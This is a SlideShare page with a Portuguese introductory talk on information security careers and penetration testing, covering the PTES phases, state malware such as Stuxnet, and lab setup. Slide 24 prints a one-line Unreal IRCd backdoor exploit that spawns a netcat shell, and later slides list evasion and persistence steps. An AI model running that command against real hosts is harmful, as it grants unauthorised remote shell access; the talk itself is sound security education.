Ce diaporama a bien été signalé.
Le téléchargement de votre SlideShare est en cours. ×

Infosec e pentesting - Escolha o seu lado!

Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité
Publicité

Consultez-les par la suite

1 sur 43 Publicité

Plus De Contenu Connexe

Diaporamas pour vous (20)

Les utilisateurs ont également aimé (20)

Publicité

Similaire à Infosec e pentesting - Escolha o seu lado! (20)

Plus récents (20)

Publicité

Infosec e pentesting - Escolha o seu lado!

  1. 1. Escolha Penetration Testing autor: Leandro Quibem Magnabosco seu lado Segurança da Informação contato: leandroqm@gmail.com
  2. 2. Quem sou eu? Leandro Quibem Magnabosco leandroqm@gmail.com ❖ Consultor de Tecnologia desde 2001 ➢ Segurança da Informação ➢ Projetos de Redes de Computadores ➢ Administração de Sistemas ➢ [...] ❖ Mestrando em Ciências da Computação ❖ Usuário de Linux desde 1999 ❖ Certificacões: OSCP (PWB), CCNA, [...]
  3. 3. Quem é você? (caso queira se tornar um Pentester) ❖ Gosta de: ➢ Tecnologia ➢ Sistemas operacionais ➢ Redes de Computadores ➢ Programação ➢ Escrever artigos técnicos ➢ Desafios ➢ Aprender ❖ Suas características: ➢ Autodidata ➢ Analítico ➢ Crítico, porém positivo ➢ Competitivo ➢ Persistente
  4. 4. InfoSec O que é ❖ Segurança da Informação ❖ É a prática de defender a informação de (da): ➢ acesso indevido, ➢ revelação, ➢ interrupção do seu fluxo, ➢ modificação, ➢ adulteração, ➢ inspeção, ➢ gravação ou ➢ destruição
  5. 5. InfoSec O que é ❖ CID ou CIA ➢ Confidencialidade ➢ Integridade ➢ Disponibilidade ❖ AAA ➢ Autenticação ➢ Autorização ➢ Auditoria ❖ Não-Repúdio ➢ Não fui eu ➢ Não sei de nada
  6. 6. InfoSec O que é ❖ Análise de Risco ➢ Análise de Malwares ■ Engenharia Reversa ➢ Análise de Sistemas ■ Avaliação crítica e analítica de sistemas ➢ Avaliação de Ameaças ■ Categorização e descoberta de ameaças ➢ Penetration Testing ■ Simulação de inimigo ● Engenharia Social ● Ataques Internos
  7. 7. InfoSec O que é ❖ Proteção e Prevenção ➢ Criptografia ➢ Design de Redes ■ Camadas, Firewalls, [...] ➢ Segurança de Redes ■ IDS/IPS, VPNs, VLANs, [...] ➢ Administração de Sistemas ■ ACLs, Privilégios, [...] ➢ Compliance ■ Certificação, Políticas, [...] ➢ Programação Segura ■ Validação de entrada, [...]
  8. 8. InfoSec O que é ❖ Outros ➢ Forência Digital ■ Resposta a Incidentes, [...] ➢ Plano de Continuidade de Negócios (PCN) ■ Backup, Redundância, [...] ➢ Treinamento ■ Não somente em ataque/defesa ➢ Educação ■ Treinamento de usuários ● Clientes e Usuários
  9. 9. InfoSec O que não é ❖ Panacéia ➢ Não há solução única ❖ Infalível ➢ Basta UMA vulnerabilidade ❖ Simples de aprender ➢ Envolve todas as áreas de conhecimento ❖ Fácil de Implementar ➢ Envolve tudo que é eletrônico ❖ Bem Recebida ➢ Decore: sS40-L1##0s++Sho0 ❖ Dinheiro fácil ➢ É preciso muito nome e lábia ❖ Padronizado ➢ Cada caso é uma solução diferente
  10. 10. InfoSec Mercado ❖ Estável e Crescente ➢ > 80% no mesmo empregador ❖ Demanda altíssima por profissionais ➢ Crescimento > 11% ao ano até 2019 (num. de profissionais) ➢ Crescimento > 20% ao ano até 2019 (demanda) ❖ Conhecimento e certificações tem muito peso ➢ Certificações para agradar RH ■ Fáceis, mas conhecidas ➢ Certificações para VOCÊ! ■ Obscuras e difíceis
  11. 11. InfoSec Mercado ❖ Vulnerabilidade em aplicações é a maior preocupação atual ❖ BYOD e Computacão em Nuvens vem em segundo ❖ Multidisciplinaridade é extremamente valorizada e cada vez mais necessária Não há software tão eficiente quanto um profissional de segurança da informação na mesma função!
  12. 12. InfoSec Cyber Warfare ❖ O mundo está em guerra! ➢ Os governos estão contratando boa parte dos profissionais do mercado ❖ Cyber-Armys em números (estimativa): ➢ China: 71.000 ➢ EUA: 31.000 ➢ Rússia: 7.300 ➢ Coréia do Norte: 6.000
  13. 13. InfoSec Cyber Warfare País % Tráfego População China 41% 1.46bi EUA 10% 318mi Turquia 4.7% 76.6mi Russia 4.3% 146mi Taiwan 3.7% 23.4mi Brasil 3.3% 203mi Romenia 2.8% 19.9mi India 2.3% 1.26bi Itália 1.6% 60.7mi Hungria 1.4% 9.8mi
  14. 14. Cyberguerra Malware - Flame ❖ FLAME ➢ Feito pela NSA, CIA e Israel ➢ Mais complexo da história ➢ Possuía "kill-switch" ➢ Espionagem high-tech ■ Skype, Contatos (Bluetooth), Áudio ambiente, Teclas Digitadas, Screnshots, Tráfego de rede ➢ Governos afetados: ■ Iran, Israel, Palestina, Sudão, Síria, Líbano, Arábia S., Egito, [...]
  15. 15. Cyberguerra Malware - Duqu ❖ Duqu ➢ Explora: (exploit) parser daTrueType do Word (shellcode) kernel do Windows ➢ Ataca controles industriais (ICS - SCADA) ➢ Tinha servidores de comando nos seguintes países: ■ Alemanha ■ Bélgica ■ Filipinas ■ China
  16. 16. Cyberguerra Malware - Stuxnet ❖ Descoberto em 2010 ❖ Desenhado para atacar PLCs em sistemas SCADA ➢ PLC - Programmable Logic Controller ■ Controle de processos eletromecânicos ➢ SCADA - Supervisory Control and Data Aquisition ■ Sistema Computadorizado de Controle Industrial ❖ Desenvolvido pelos Estados Unidos em conjunto com Israel para atrasar o enriquecimento de urânio no Iran
  17. 17. Cyberguerra Red October
  18. 18. Last Change No turning back!
  19. 19. Pentest O que é ❖ Modalide de Hacking Ético ❖ Definição: Simular um adversário malicioso para avaliar a segurança de um sistema computacional, dispositivo ou rede ❖ Em outras palavras: ➢ Em um cenário real, que tipo de problemas um hacker habilidoso poderia trazer para meus sistemas ou minha companhia?
  20. 20. Pentest Pra que serve? ❖ Determinar a viabilidade de um conjunto de vetores de ataque ❖ Identificar vulnerabilidades de alto risco resultantes de uma combinação de vulnerabilidades de baixo risco ❖ Avaliar a magnitude do impacto operacional em caso de ataque ❖ Prover evidências para justificar o custo no investimento em segurança da informação para investidores ❖ [...]
  21. 21. Pentesting Onde encaixa? ❖ Unifica diversos nichos de Segurança da Informação ❖ É mais difícil que o trabalho do atacante malicioso ➢ Não importa onde as vulnerabilidades estão ➢ Não importa quantas são ■ O atacante malicioso precisa encontrar quantas? ➢ E quem faz o Relatório?
  22. 22. Pentesting Engenharia Social ❖ Manipulação psicológica ❖ Explora vulnerabilidades inerentes de seres humanos ❖ Phishing ➢ Phone Phishing ➢ Baiting ❖ Quid pro quo ❖ Tailgating
  23. 23. Conceitos Ferramentas ❖ Server-side / Client Side Attack ❖ Google Hacking ❖ Wayback Machine ❖ DoS / DDoS ❖ Banners ❖ Bruteforce ❖ Rainbow Tables ❖ Sniffing ❖ Hijacking ❖ Cache Poisoning (ARP/DNS) ❖ MIDM/MITM ❖ Spoofing (IP/MAC/ARP) ❖ Backdoor ❖ Core Impact ❖ Metasploit ❖ W3AF ❖ BurpSuite ❖ Nessus / OpenVAS ❖ Armitage ❖ Wireshark ❖ Ettercap ❖ nmap ❖ netcat ❖ ssh ❖ curl ❖ [...]
  24. 24. Unreal IRCd eXploit echo "AB;nc -l -e /bin/sh -p 12345" | ncat IP 6667
  25. 25. Shellshock eXploit
  26. 26. Heartbleed vulnerability
  27. 27. Pentesting Padrão ❖ Usaremos como base o PTES: Penetration Testing Execution Standard http://www.pentest-standard.org/ ❖ PTES é uma tentativa de formalizar os testes de penetração ➢ é colaborativo ➢ grande parte da comunidade colabora com o PTES
  28. 28. Pentesting Etapas ETAPA NOME NO PTES 1. Preparação (Pre-Engangement) 2. Coleta de Informações (Intelligence Gathering) 3. Modelagem de Ameaças (Threat Modelling) 4. Análise de Vulnerabilidades (Vulnerability Analysys) 5. Corrupção / Invasão (Exploitation) 6. Pós-Engajamento (Não está no PTES) 7. Relatório (Reporting)
  29. 29. Etapa 1 Preparação Objetivos: 1. Definir Escopo 2. Definir Objetivos 3. Termos do Teste 4. Comunicação 5. Regras do Ataque 6. Capacidade Técnica do cliente e Tecnologias em Uso 7. Proteger-se ● Discutir na reunião de definição do Escopo: ○ Engenharia Social, BYOC, DoS e DDoS, [...]) ● Sempre se informe sobre em que país estão os servidores ● Há algum sistema frágil ou que devemos evitar? ● Contatos de emergência ● Como lidar com evidências ● [...]
  30. 30. Etapa 2 Coleta de Inf. 1. Seleção de alvos a. Pela importância para o negócio ou localização na topologia de rede 2. OSINT a. O que é público 3. HUMINT a. Engenharia Social 4. Avaliação Interna 5. Avaliação Externa 6. Identificar mecanismos de segurança
  31. 31. Etapa 3 Org. Ameaças 1. Identificar Ativos a. O que importa para seu cliente? 2. Análise de Processos do Cliente 3. Análise de Ameaças a. Competidores b. Usuários Internos i. Funcionários insatisfeitos c. Espionagem Industrial 4. Análise da Capacidade das Ameaças
  32. 32. Etapa 4 Análise de Vuln. 1. Testes a. Ativos: Scanning b. Passivos: Sniffing 2. Validação a. Correlacionar Scaneamentos b. Teste manual 3. Pesquisa a. www.exploit-db.com b. Google Hacking c. Senhas padrão d. Replicar ambiente para testes
  33. 33. Etapa 5 Invasão 1. Evadir mecanismos de segurança a. Encoding (Evasão de AV) b. Proccess Injection 2. Verificar possibilidades de DoS a. Se acordado na Etapa 1 3. Verificar exploits públicos a. É comum que tenham backdoors 4. Desenvolver Exploits a. Se necessário... 5. Executar ataque a. Abuse de técnicas de Evasão de IDS/IPS sempre que puder
  34. 34. Etapa 6 Pós-Engajamento 1. Análise de Infra a. VPNs, Rotas, Proxies, Topografia da Rede 2. Identificar o que é importante a. Câmeras, Repositórios de Código, Bancos de Dados 3. Capturar ativos e evidências 4. Island Hopping 5. Garantir acesso a. Credenciais, Backdoors, Conexões reversas, Rootkits 6. Limpeza - Você nunca esteve lá
  35. 35. Etapa 7 Relatório 1. Garantir Documentação 2. Arquivar Evidências e criptografá-las para entrega 3. Restaurar backups (se necessário) 4. Geração do Sumário Executivo a. O que foi encontrado b. Recomendações em bom português 5. Relatório Técnico a. Detalhado e com sugestões b. Procure sempre elogiar tudo que encontrar de positivo
  36. 36. Como aprender Pentesting ❖ Seja autodidata! ❖ Estude tópicos de interesse ➢ Sistemas Operacionais ■ Linux, Windows, FreeBSD, [...] ➢ Protocolos de Rede ➢ Banco de Dados ■ MySQL + NoSQL ➢ Arqtuitetura Web ➢ Programação ➢ Tipos mais comuns de bugs
  37. 37. Como aprender Pentesting ❖ Livros não te ensinam Pentesting ➢ ideias e ferramentas ❖ Seja criativo! ❖ Foque onde você é melhor Se for possível substituí-lo por uma ferramenta automatizada, você será! ❖ Faça DIREITO! ➢ Cortar caminho é regredir ❖ Aprenda a explorar as vulnerabilidades manualmente
  38. 38. Laboratório Vantagens ❖ Vantagens ➢ Evita problemas com a lei ➢ Não há limitação de banda ➢ Pode-se testar DoS ➢ Scanning agressivo ➢ Replicação de cenários ➢ Elaboração de exploits ➢ Mais próximo do mundo real sem infringir leis ➢ Aprenda no seu ritmo
  39. 39. Laboratório Desvantagens ❖ Desvantagens: ➢ Pode custar caro ➢ Limitação de espaço ➢ Gastos com energia ➢ Difícil de conseguir diversidade ➢ Alta complexidade para replicar certos cenários ➢ Implementação trabalhosa ➢ Pode criar vulnerabilidades na sua rede abertas ao mundo
  40. 40. Laboratório Solução ❖ Virtualização ➢ Menos máquinas ➢ Menos espaço físico ➢ Roteamento interno ❖ VLANs ➢ Dividir redes ❖ Emuladores ❖ LiveCDs e Preparados ➢ Metasploitable ➢ Damn Vulnerable Webapp ➢ Damn Vulnerable Linux ➢ DE-ICE ➢ pWnOS
  41. 41. Dicas Informações ❖ Reddit ➢ www.reddit.com/r/netsec ➢ www.reddit.com/r/asknetsec ➢ www.reddit.com/r/netsecstudents ❖ IRC - irc.FreeNode.org ➢ #offsec, #linux, #debian, #python ❖ Listas de e-mail ➢ http://seclists.org/fulldisclosure/ ❖ Web ➢ https://isc.sans.edu// ➢ http://www.cio.com/category/security/ ❖ Twitter: @advanced_sec, @TheHackerNews @corelanc0d3r, @kevinmitnick, @mubix, @hdmoore, [...]

×